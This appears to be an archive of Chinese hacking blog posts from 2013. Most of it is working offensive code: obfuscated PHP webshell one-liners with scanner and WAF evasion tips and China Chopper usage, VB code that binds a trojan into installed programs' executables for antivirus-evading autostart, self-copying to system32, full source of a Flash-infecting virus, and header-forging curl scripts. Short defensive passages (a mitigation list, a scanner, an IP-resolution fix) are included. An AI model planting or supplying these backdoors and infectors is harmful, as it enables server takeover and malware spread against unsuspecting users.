2013-08-04
Using JS to detect whether a site is visited from a phone or a computer
The code:

```html
<script type="text/javascript" language="javascript">
// <![CDATA[
(function(){
    var res = GetRequest();
    var par = res['index'];
    if(par!='gfan'){
        var ua=navigator.userAgent.toLowerCase();
        var contains=function (a, b){
            if(a.indexOf(b)!=-1){return true;}
        };
        // Change http://wap.nobb.cc/ below to the address of your WAP mobile site
        var toMobileVertion = function(){
            window.location.href = 'http://wap.nobb.cc/'
        }
        if(contains(ua,"ipad")||(contains(ua,"rv:1.2.3.4"))||(contains(ua,"0.0.0.0"))||(contains(ua,"8.0.552.237"))){return false}
        if((contains(ua,"android") && contains(ua,"mobile"))||(contains(ua,"android") && contains(ua,"mozilla")) ||(contains(ua,"android") && contains(ua,"opera")) ||contains(ua,"ucweb7")||contains(ua,"iphone")){toMobileVertion();}
    }
})();
function GetRequest() {
    var url = location.search; // the part of the URL starting at "?"
    var theRequest = new Object();
    if (url.indexOf("?") != -1) {
        var str = url.substr(1);
        var strs = str.split("&");
        for(var i = 0; i < strs.length; i ++) {
            // each entry is "name=value"
            theRequest[strs[i].split("=")[0]]=unescape(strs[i].split("=")[1]);
        }
    }
    return theRequest;
}
// ]]>
</script>
```

Tested it on a phone and it works quite well.
2013-08-02
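Those powerful PHP one-line backdoors
Powerful PHP one-line backdoors: this class of backdoor is a real headache for website and server administrators, who constantly have to switch between detection methods, and many of the newer writing techniques cannot be found or handled by ordinary detection at all. Today we go through some interesting PHP one-line trojans.

Hiding a small PHP shell in a 404 page:

```php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e", $_POST['error'], "saft");
header('HTTP/1.1 404 Not Found');
?>
```

The 404 page is a file almost every site has, and once it has been created hardly anyone checks or modifies it again. That makes it a place where a backdoor can be hidden.

A PHP one-liner with no signature:

```php
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode'] && preg_replace('\'a\'eis', 'e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))', 'a');
?>
```

It assigns the content of $_POST['code'] to $_SESSION['theCode'] and then executes $_SESSION['theCode']. The highlight is that there is no signature string: a scanning tool that checks the code will not raise an alert, so the goal is achieved.

A super-stealthy PHP backdoor:

```php
<?php $_GET[a]($_GET[b]);?>
```

The trojan is built from nothing but GET parameters. Usage:

```
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
```

After execution, the one-line trojan c.php is created in the current directory. When parameter a is eval, an error is reported and the trojan is not created; with assert an error is reported as well, but the trojan is created. Not to be underestimated: one simple line, stretched to this kind of use.

Layered requests, PHP backdoor that runs encoded code: this method uses two files. File 1:

```php
<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
    eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
```

File 2:

```php
<?php
//2.php
header('Content-type:text/html;charset=utf-8');
// the code to execute
$code = <<<CODE
phpinfo();
CODE;
// base64-encode it
$code = base64_encode($code);
// build the referer string
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
// backdoor URL
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);
```

The base64-encoded code is run through HTTP_REFERER in the HTTP request, which gives the backdoor effect. WAFs generally inspect the referer more loosely, or not at all, so this idea works well for bypassing a WAF.

The PHP backdoor generator weevely: weevely is free software for PHP webshells that can simulate a telnet-like shell connection. It is usually used for exploiting web applications, for hiding backdoors, or as a telnet-like replacement for web-page-based management. The server-side PHP code weevely generates is base64-encoded, so it can fool mainstream antivirus software and IDS; once the server-side code has been uploaded it can usually be run directly through weevely. The PHP backdoors weevely generates use the currently common combination of base64 encoding and string mangling. The functions that appear in the backdoor are all ordinary string-handling functions, and functions that detection rules look for, such as eval and system, never appear directly in the code, so the backdoor file gets past backdoor-finding tools. A scan with 暗组's web backdoor scanner reports the file as no threat at all.

Three obfuscated one-line PHP trojans. The first:

```php
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
```

In China Chopper (菜刀) enter http://site/1.php?2=assert; the password is 1.

The second:

```php
<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
```

In China Chopper enter http://site/2.php?_=assert&__=eval($_POST['pass']); the password is pass. It is even stealthier if you use China Chopper's additional-data field, and other injection tools work too, because it is submitted by POST.

The third:

```php
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e', '@'.str_rot13('riny').'($b4dboy)', 'add');
```

str_rot13('riny') is eval in encoded form. It avoids the keyword completely without losing any effect, which is maddening!

Finally, a few advanced PHP one-line trojan backdoors:

```php
// 1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// China Chopper one-liner

// 2.
$filename=$_GET['xbid'];
include ($filename);
// the dangerous include function: runs any file as PHP

// 3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// renames any file

// 4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// China Chopper one-liner

// 5.
include ($uid);
// the dangerous include function: runs any file as PHP
// POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
// a one-liner inserted into a gif

// 6. Typical one-liners
<?php eval_r($_POST[sb])?>
<?php @eval_r($_POST[sb])?>
// error-suppressing version
<?php assert($_POST[sb]);?>
// use the expert mode of the lanker one-liner client to execute the PHP statements
<?$_POST['sa']($_POST['sb']);?>
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
<?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
// with this one, when configuring the connection in the China Chopper client, enter the following in the "Configuration" field
<O>h=@eval_r($_POST1);</O>
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that gets around a restriction on <?
```

In short, these PHP one-line backdoors are small but complete, and a moment of carelessness is all it takes to be hit. So where is the real focus of this article? It is in the summary below!

How to deal with PHP one-line backdoors. We stress a few key points; you who are reading this are presumably no layman, so I will not ramble:

1. Have security awareness when writing PHP programs.
2. Read the server log files often and back them up often.
3. Assign strict permissions to every site.
4. Run batch security reviews of dynamic files and directories regularly.
5. Learn how to do manual malware removal (that is, detection and removal based on behaviour).
6. Keep following, or join, active network security communities.
7. Handle the server environment in layers; even a single function can be made into a rule.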
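For point 4 (batch review of dynamic files), an added example that is not part of the original article: a small Python scanner whose heuristics are modelled on the snippets quoted above. The rule names and sample file names are made up for the illustration, and a clean result only means that none of these particular patterns matched.

```python
import codecs
import re
from pathlib import Path

REQ = r"\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER|SESSION)"
HIDDEN = {"eval", "assert", "system", "exec", "passthru", "shell_exec"}

# Heuristics modelled on the snippets quoted in the article (rule names are made up here).
RULES = {
    # preg_replace, or a variable holding its name, with the /e modifier, which
    # evaluates the replacement string as PHP code (the modifier was removed in PHP 7.0).
    "preg_replace_e": re.compile(
        r"""(?:preg_replace|\$\w+)\s*\(\s*(["'])(?:\\.|(?!\1).)*?"""
        r"""(?:\\.|(?!\1)[^\w\s\\])[a-z]*e[a-z]*\1""", re.I | re.S),
    # $_GET[a]($_GET[b]): a request value is used as the function name.
    "request_value_as_function": re.compile(REQ + r"\s*\[[^\]]*\]\s*\("),
    # $_($_POST[1]): a variable function is called directly on request data.
    "variable_call_on_request": re.compile(r"\$\w+\s*\(\s*@?\s*" + REQ),
    # eval/assert applied to request data or to base64-decoded data.
    "eval_of_input": re.compile(
        r"\b(?:eval|assert)\s*\(\s*@?\s*(?:" + REQ + r"|base64_decode)", re.I),
    # "p"."r"."e"."g"...: an identifier assembled one character at a time.
    "char_concat_name": re.compile(
        r"""(?:["'][A-Za-z_]["']\s*\.\s*){3,}["'][A-Za-z_]["']"""),
}
ROT13_CALL = re.compile(r"""str_rot13\s*\(\s*["'](\w+)["']\s*\)""", re.I)


def scan_php(source):
    """Return the sorted names of the heuristics that fire on one file's text."""
    hits = {name for name, rx in RULES.items() if rx.search(source)}
    # str_rot13('riny') style: decode the literal and see whether it names a sink.
    for word in ROT13_CALL.findall(source):
        if codecs.decode(word, "rot13").lower() in HIDDEN:
            hits.add("rot13_hidden_name")
    return sorted(hits)


def scan_tree(root):
    """Scan every file under root that contains a PHP open tag, whatever its
    extension (the article hides code in a 404 page and in a .gif)."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            text = path.read_text(encoding="latin-1")
            hits = scan_php(text) if "<?" in text else []
            if hits:
                report[str(path)] = hits
    return report


# Inputs: three snippets quoted from the article plus one constructed benign file.
SAMPLES = {
    "404.php": """<?php @preg_replace("/[pageerror]/e", $_POST['error'], "saft"); ?>""",
    "get.php": "<?php $_GET[a]($_GET[b]);?>",
    "rot.php": """<?php @preg_replace('/ad/e', '@'.str_rot13('riny').'($b4dboy)', 'add');""",
    "benign.php": r"""<?php echo preg_replace('/\s+/', ' ', $title); $log('done');""",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan_php(src) or "clean")
```

Pattern matching of this kind is what the article's authors set out to evade, so it belongs next to points 2 and 5 (log review and behaviour-based checks), not in place of them.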
2013-07-21
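VB: checking whether the program itself has been modified (anti-unpacking)
Written a while ago; it uses two checks: 1. check its own file size, 2. check the CRC32 (an MD5 check would of course work too). A few more words: the simplest thing is to add a nasty packer, otherwise against an expert all of this counts for nothing. Screenshot first. The code: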
2013-07-14
VB remote-control AV evasion: getting autostart past antivirus software
I once bought the book 《终极免杀》; it is a decent book, and what I mainly wanted was its section on evading 360. It describes this method of getting autostart. The idea: look up the path of a specific installed program (through the registry), then bind the trojan to that program's main executable and replace it. Some programs check themselves; that part is up to you. The resource file in the source holds the trojan, and the source infects Thunder (迅雷), though of course you can change it to something else! Core module code:

```vb
Function GanRanExe(ByVal sFilePath As String)
    Dim MyArray() As Byte
    Dim CurrentSize As Long
    Dim FileArray() As Byte, FileArray1() As Byte
    Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
    ReDim MyArray(LOF(1) - 1)
    Get #1, , MyArray
    Close #1
    Open sFilePath For Binary Access Read As #1
    ReDim FileArray(LOF(1) - 1)
    Get #1, , FileArray
    Close #1
    FileArray1 = LoadResData(101, "CUSTOM")
    Kill sFilePath
    Open sFilePath For Binary Access Write As #1
    Put #1, , MyArray
    Put #1, , FileArray
    CurrentSize = LOF(1)
    Put #1, , FileArray1
    Put #1, , "GanRanFileTbide" & UBound(MyArray) + 1 & "," & UBound(FileArray) + 1 & "," & CurrentSize & "," & UBound(FileArray1) + 1
    Close #1
End Function

Function FenLiGanRanExe(ByVal FenLiToFilePath As String)
    On Error Resume Next
    Dim MyArray() As Byte
    Dim FileArray() As Byte
    Dim FenLiXinXi() As String
    Dim FenLiXinXiSize() As String
    Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
    ReDim MyArray(LOF(1) - 1)
    Get #1, , MyArray
    FenLiXinXi = Split(StrConv(MyArray, vbUnicode), "GanRanFileTbide")
    FenLiXinXiSize = Split(FenLiXinXi(UBound(FenLiXinXi)), ",")
    ReDim FileArray(FenLiXinXiSize(1) - 1)
    Get #1, FenLiXinXiSize(0) + 1, FileArray
    Close #1
    Kill FenLiToFilePath
    Open FenLiToFilePath For Binary Access Write As #1
    Put #1, 1, FileArray
    Close #1
End Function

Function FenLiGanRanExe1(ByVal FenLiToFilePath As String)
    On Error Resume Next
    Dim MyArray() As Byte
    Dim FileArray() As Byte
    Dim FenLiXinXi() As String
    Dim FenLiXinXiSize() As String
    Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
    ReDim MyArray(LOF(1) - 1)
    Get #1, , MyArray
    FenLiXinXi = Split(StrConv(MyArray, vbUnicode), "GanRanFileTbide")
    FenLiXinXiSize = Split(FenLiXinXi(UBound(FenLiXinXi)), ",")
    ReDim FileArray(FenLiXinXiSize(3) - 1)
    Get #1, FenLiXinXiSize(2) + 1, FileArray
    Close #1
    Kill FenLiToFilePath
    Open FenLiToFilePath For Binary Access Write As #1
    Put #1, 1, FileArray
    Close #1
End Function

Function TestGanRan(ByVal sFilePath As String) As Boolean
    Dim FileArray() As Byte
    Open sFilePath For Binary Access Read As #1
    ReDim FileArray(LOF(1) - 1)
    Get #1, , FileArray
    Close #1
    If InStr(StrConv(FileArray, vbUnicode), "GanRanFileTbide") > 0 Then
        TestGanRan = True
    Else
        TestGanRan = False
    End If
End Function

Public Function ReadReg(ByVal hKey)
    On Error Resume Next
    Set pReg = CreateObject("Wscript.Shell")
    ReadReg = pReg.RegRead(hKey)
End Function

Function PanDuanpath() As Boolean
    On Error Resume Next
    Dim thunderPath
    thunderPath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Thunder Network\ThunderOem\thunder_backwnd\dir")
    If Dir(thunderPath & "\Program\Thunder.exe") <> "" Then
        FrmMain.Combo1.AddItem thunderPath
        FrmMain.Combo1.Text = thunderPath
    Else
    End If
    Dim Qvodpath
    Qvodpath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\QvodPlayer\Insert\Insertpath")
    If Dir(Qvodpath & "/QvodPlayer.exe") <> "" Then
        FrmMain.Combo1.AddItem Qvodpath
        FrmMain.Combo1.Text = Qvodpath
    Else
    End If
    Dim PPSpath
    PPSpath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PPStream.exe\Path")
    If Dir(PPSpath & "/PPStream.exe") <> "" Then
        FrmMain.Combo1.AddItem PPSpath
        FrmMain.Combo1.Text = PPSpath
    Else
    End If
End Function
```

Source code download: http://pan.baidu.com/share/link?shareid=603098846&uk=1547026424
2013-07-14
VB: self-deletion + copying to the system directory
Something I wrote a while ago out of boredom. Note: copying a file to drive C is a sensitive operation, and 360 will definitely raise a prompt. Perhaps the file could first be renamed to an image, then copied, and then have its extension changed back. The code:

```vb
Private Sub Form_Load()
    If Right(App.Path, 1) = "\" Then
        Path = App.Path
    ElseIf Right(App.Path, 1) <> "\" Then
        Path = App.Path + "\"
    End If
    If LCase(Path & App.EXEName & ".exe") <> LCase(Environ("windir") & "\system32\Jonty.exe") Then
        'MsgBox Path & App.EXEName & ".exe" + vbCrLf + Environ("windir") & "\system32\Jonty.exe"
        FileCopy Path & App.EXEName & ".exe", Environ("windir") & "\system32\Jonty.exe"
        'Shell Environ("windir") & "\system32\Jonty.exe", vbHide
        Call killmyself
        Shell Path & "killmyself.bat", vbHide
        End
    Else
        MsgBox "这里执行你要运行的文件"
        Call killmyself
        End
    End If
End Sub

Sub killmyself()
    Open App.Path & "\killmyself.bat" For Output As #1
    '"@echo off": do not show the commands as they run
    Print #1, "@echo off"
    Print #1, "sleep 500"
    'a.bat deletes the specified file
    Print #1, "del " & App.EXEName + ".exe"
    'a.bat deletes itself
    Print #1, "del killmyself.bat"
    Print #1, "cls"
    Print #1, "exit"
    Close #1
End Sub
```
2013-07-14
VB syntax-highlighting notepad
A very nice piece of source code collected from the web, and it is really fast!
2013-05-27
A worm written in VB that is nastier than sobig!!!
The code:
2013-05-08
Forging the IP and referer with PHP curl
The forging file, 1.php:

```php
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://localhost/2.php");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:8.8.8.8', 'CLIENT-IP:8.8.8.8')); // forge the IP
curl_setopt($ch, CURLOPT_REFERER, "http://www.xssxss.com/"); // forge the referer
curl_setopt($ch, CURLOPT_HEADER, 1);
$out = curl_exec($ch);
curl_close($ch);
?>
```

The script that shows the effect, 2.php:

```php
<?php
function getClientIp() {
    if (!empty($_SERVER["HTTP_CLIENT_IP"]))
        $ip = $_SERVER["HTTP_CLIENT_IP"];
    else if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
        $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    else if (!empty($_SERVER["REMOTE_ADDR"]))
        $ip = $_SERVER["REMOTE_ADDR"];
    else
        $ip = "err";
    return $ip;
}
echo "IP: " . getClientIp() . "";
echo "referer: " . $_SERVER["HTTP_REFERER"];
?>
```
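The forgery works because getClientIp() in 2.php believes the Client-IP and X-Forwarded-For request headers, which any client can set. The following added example (not from the original post; a Python sketch in which the dict mirrors PHP's $_SERVER keys and the 10.0.0.0/8 proxy range is an assumption) resolves the address from REMOTE_ADDR and consults X-Forwarded-For only when the request arrived through a trusted proxy.

```python
import ipaddress

# Assumption for this example: the only reverse proxies in front of the app.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _is_trusted(addr):
    return any(addr in net for net in TRUSTED_PROXIES)


def _parse(value):
    """Return an ip_address, or None if the field is not a valid IP."""
    try:
        return ipaddress.ip_address(value.strip())
    except ValueError:
        return None


def client_ip(server):
    """Resolve the client address from a dict shaped like PHP's $_SERVER.

    REMOTE_ADDR is the TCP peer and cannot be set by a request header.
    X-Forwarded-For is consulted only when that peer is a trusted proxy, and is
    read right to left: each proxy appends the peer it saw, so the first
    untrusted hop from the right is the real client. Client-IP is never used.
    """
    peer = _parse(server.get("REMOTE_ADDR", ""))
    if peer is None:
        raise ValueError("missing or invalid REMOTE_ADDR")
    if not _is_trusted(peer):
        return str(peer)              # direct connection: ignore all headers
    hops = server.get("HTTP_X_FORWARDED_FOR", "").split(",")
    for hop in reversed(hops):
        addr = _parse(hop)
        if addr is None:
            break                     # garbage in the chain: stop trusting it
        if not _is_trusted(addr):
            return str(addr)
        peer = addr                   # another trusted proxy, keep walking left
    return str(peer)


# Constructed requests carrying the same forged headers that 1.php sends.
DIRECT_FORGED = {"REMOTE_ADDR": "203.0.113.7",
                 "HTTP_X_FORWARDED_FOR": "8.8.8.8",
                 "HTTP_CLIENT_IP": "8.8.8.8"}
VIA_PROXY_FORGED = {"REMOTE_ADDR": "10.0.0.5",
                    "HTTP_X_FORWARDED_FOR": "8.8.8.8, 203.0.113.7"}

if __name__ == "__main__":
    print(client_ip(DIRECT_FORGED), client_ip(VIA_PROXY_FORGED))
```

The Referer header has no equivalent fix: it is entirely client-supplied and can only be treated as untrusted input.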
2013-03-01
Source code of the first virus to infect Flash
The code:

SWF/LFM-926 Virus:

```asm
; ------------------
; Description: WinNT/XP Virus dropper for Flash .SWF files!
; Masm Version 6.11: ML.EXE SWF.ASM
; Virus Size: 926 bytes
; Infection Size: 3247 bytes.
; Last Edit: 01/08/2002
; --------------------------------- Begin Source Code ------------------------------------
.286
.model tiny
.code
org 100h
Entry:
    jmp Start
VIR_SIZE equ Virus_End-Entry
DTA db 128 dup(0) ; Offset DTA+30 = filename
HANDLE dw ? ; Handle to host file
PTR1 dd 0 ; Segment address of the created memory block
PATH db "*.SWF",0 ; File mask
BINARY db "v.com",0 ; Binary code
HEX db "0123456789ABCDEF" ; Binary to hex
; Flash header block.
; -------------------
SIGN_FW dw ? ; SWF file format
SIGN_S db ?
VERSION_NUM db ?
FILE_LENGTH dw ?
    dw ?
STATIC_HDR_SIZE equ $-SIGN_FW
RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isnt static. ;(
RECT_BUF_SIZE equ $-RECT_BUF
HDR_SIZE dw ? ; Holds the true header size!
; Start of Viral Frame 0.
; -----------------------
Drop_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes!
TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG]
    dw 0
    db 083h ; ActionGetUrl Tag
ACTION_LENGTH dw 0 ; (Drop_BEGIN_SIZE-9)+(SUM OF Drop_MIDDLE)+(Drop_END_SIZE)
    db FSCommand:exec
    db 000h
    db cmd.exe
    db 009h ; chr(9) is Flash code for a space character.
    db /c
    db 009h
    db echo
    db 009h
    db Loading.Flash.Movie...
    db &
    db (echo
    db 009h
    db n
    db 009h
    db v.com&echo
    db 009h
    db a
    db 009h
    db 100&
Drop_BEGIN_SIZE equ $-Drop_BEGIN
Drop_MIDDLE db echo
    db 009h
    db db
    db 009h
    db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes.
    db &
Drop_MIDDLE_SIZE equ $-Drop_MIDDLE
Drop_END db &echo.&echo
    db 009h
    db rcx&echo
    db 009h
    db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes.
    db &echo
    db 009h
    db w&echo
    db 009h
    db q)|debug.exe>nul&start
    db 009h
    db /b
    db 009h
    db v.com
    db 000h ; StringEnd Tag
Drop_END_SIZE equ $-Drop_END
; End of Viral Frame 0.
; ---------------------
END_TAG db 001h ; Action code 0x01 = tagshowframe Tag

Start:
    mov ax,(VIR_SIZE+0fh)
    shr ax,4
    shl ax,1
    mov bx,ax ; Allocate (VirusSize*2)
    mov ah,4ah
    int 21h ; Resize block
    jc ExProg
    mov dx,offset DTA ; Set DTA operation
    mov ah,1ah
    int 21h
    mov cx,07h
    mov dx,offset PATH
    mov ah,4eh ; FindFirst
    int 21h
    jc ExProg
    jmp Infect
Cycle:
    mov dx,offset PATH
    mov ah,4fh ; FindNext
    int 21h
    jc ExProg
    jmp Infect
ExProg:
    mov ax,4301h ; Hide v.com
    mov cx,02h
    mov dx,offset BINARY
    int 21h
    mov ax,4c00h ; End program
    int 21h
Infect:
    mov byte ptr DTA[30+12],$
    mov dx,offset (DTA+30)
    mov ax,3d02h ; Open host file
    int 21h
    jc ExProg
    mov [HANDLE],ax ; Save file handle
    mov ax,3f00h ; Read file Header
    mov dx,offset SIGN_FW
    mov bx,[HANDLE]
    mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE)
    int 21h
    jc ExProg
    cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file.
    jne Cycle ; Try another file ...
    cmp byte ptr SIGN_S,S
    jne Cycle
    cmp byte ptr VERSION_NUM,099h ; Already infected?
    je Cycle
    mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag.
    xor di,di ; Seems to always exist directly after the header.
next:
    cmp byte ptr RECT_BUF[di],043h
    jne not_found
    cmp byte ptr RECT_BUF[di+1],002h
    jne not_found
    jmp found
not_found:
    inc di
    loop next
    jmp Cycle
found:
    mov word ptr HDR_SIZE,STATIC_HDR_SIZE
    add word ptr HDR_SIZE,di ; Compute the header size
    mov ax,4200h ; Reset file ptr right after Flash header
    xor cx,cx
    mov dx,[HDR_SIZE]
    int 21h
    jc ExProg
    push bx
    mov ax,word ptr FILE_LENGTH
    add ax,15
    shr ax,4
    mov bx,ax
    mov ah,48h ; Allocate memory for target host file
    int 21h
    pop bx
    jc ExProg
    mov word ptr PTR1[2],ax ; Save pointer to allocated block
    mov cx,word ptr FILE_LENGTH
    sub cx,[HDR_SIZE]
    mov ah,3fh ; Read host file into memory block
    push ds
    lds dx,[PTR1]
    int 21h
    pop ds
    jc ExProg
    mov ax,4200h ; Reset file ptr to the middle code section
    xor cx,cx
    mov dx,[HDR_SIZE]
    add dx,Drop_BEGIN_SIZE
    int 21h
    jc ExProg
    ;
    ; The following code is a key technique. It simply converts the
    ; virus from binary to hex characters and then inserts them into the host
    ; using a standard format that DEBUG.EXE expects! Flash only really
    ; allows plain text, so this satisfies that condition.
    ;
    mov word ptr ACTION_LENGTH,(Drop_BEGIN_SIZE-9+Drop_END_SIZE)
    push bx
    mov cx,VIR_SIZE
    xor si,si
    xor di,di
ToHex:
    mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex number
    mov al,byte ptr Entry[si]
    mov ah,al
    and al,00001111y
    xlat
    mov Drop_MIDDLE[STATIC_HDR_SIZE+di+1],al
    shr ax,12
    xlat
    mov Drop_MIDDLE[STATIC_HDR_SIZE+di],al
    inc si
    inc di
    inc di
    inc di
    mov ax,si
    mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line.
    div bl
    or ah,ah
    jnz cont
    push cx
    xor di,di
    add word ptr ACTION_LENGTH,Drop_MIDDLE_SIZE
    mov bx,[HANDLE] ; Write hex dump entry XX,...,XX
    mov dx,offset Drop_MIDDLE
    mov cx,Drop_MIDDLE_SIZE
    mov ax,4000h
    int 21h
    jc ExProg
    pop cx
cont:
    loop ToHex
    pop bx
    or di,di
    jz no_remainder
    mov dx,offset Drop_MIDDLE
    mov cx,di
    add cx,7 ; STATIC_HDR_SIZE-1
    add word ptr ACTION_LENGTH,cx
    mov ax,4000h ; Write remainder hex dump entry XX,...,XX
    int 21h
    jc ExProg
no_remainder:
    mov dx,offset Drop_END
    mov cx,Drop_END_SIZE+1
    mov ax,4000h ; Write end code and end of frame tag(01) into host
    int 21h
    jc ExProg
    mov cx,word ptr FILE_LENGTH
    sub cx,[HDR_SIZE]
    mov ax,4000h ; Write host code directly after viral code.
    push ds
    lds dx,[PTR1]
    int 21h
    pop ds
    jc ExProg
    ; Patch the header with new viral values.
    mov cx,word ptr ACTION_LENGTH
    add cx,4
    mov word ptr TAG_LENGTH,cx
    add cx,6
    add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6)
    ; Set infection marker
    mov byte ptr VERSION_NUM,099h
    mov di,[HDR_SIZE]
    inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1
    mov ax,4200h ; Re-wind to start of file
    xor cx,cx
    xor dx,dx
    int 21h
    jc ExProg
    mov dx,offset SIGN_FW
    mov cx,[HDR_SIZE]
    mov ax,4000h ; Write updated viral header
    int 21h
    jc ExProg
    mov dx,offset Drop_BEGIN
    mov cx,Drop_BEGIN_SIZE
    mov ax,4000h ; Write begin code into host
    int 21h
    jc ExProg
    mov ah,49h ; Free memory block
    mov es,word ptr PTR1[2]
    int 21h
    jc ExProg
    mov ax,3e00h ; Close file
    int 21h
    jc ExProg
    jmp Cycle ; DONE! Try to infect another.
Virus_End:
end Entry
```
2013-02-27
Ways to show off when replying on Baidu Tieba
First write the text and images of your reply and fill in the captcha. When copying, leave out the first two letters "ja", paste the rest into the address bar, then type the two letters "ja" by hand at the very front and press Enter, and that's it!

Long tail:

```javascript
javascript:var%20b=rich_postor._editor.getHtml();c=rich_postor._getData();c.content='<span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper">'+b+'<img%20pic_type="3"%20class="bde_image"%20src="http://imgsrc.baidu.com/forum/pic/item/6f657e2eb9389b50e1daf96e8435e5dde7116e1d.jpg"%20height="1"%20width="1">';PostHandler.post(rich_postor._option.url,c,function(I){rich_postor.showAddResult(I)},function(I){});void%200
```

Tieba blue text (may get censored):

```javascript
